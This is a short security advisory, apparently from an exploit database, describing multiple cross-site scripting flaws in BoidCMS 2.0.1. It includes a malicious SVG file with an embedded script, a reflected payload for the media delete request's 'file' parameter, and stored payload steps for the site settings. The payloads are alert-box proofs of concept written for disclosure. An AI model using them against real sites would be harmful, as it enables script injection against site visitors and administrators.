Headline
BoidCMS 2.0.1 Cross Site Scripting
BoidCMS version 2.0.1 suffers from multiple cross site scripting vulnerabilities. Original discovery of cross site scripting in this version is attributed to Rahad Chowdhury in December of 2023, though this advisory provides additional vectors of attack.
# Exploit Title: Multiple XSS Issues in boidcmsv2.0.1# Date: 3/2024# Exploit Author: Andrey Stoykov# Version: 2.0.1# Tested on: Ubuntu 22.04# Blog: http://msecureltd.blogspot.comXSS via SVG File UploadSteps to Reproduce:1. Login with admin user2. Visit "Media" page3. Upload xss.svg4. Click "View" and XSS payload will execute// xss.svg contents<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"stroke="#004400"/> <script type="text/javascript"> alert(`XSS`); </script></svg>Reflected XSS:Steps to Reproduce:1. Login as admin2. Visit "Media" page3. Click "Delete" and intercept the HTTP GET request4. In "file" parameter add the payload "<script>alert(1)</script>"5. After forwarding the HTTP GET request a browser popup would surfaceStored XSS:Steps to Reproduce:1. Login as admin2. Visit "Settings" page3. Enter XSS payload in "Title", "Subtitle", "Footer"4. Then visit the blog page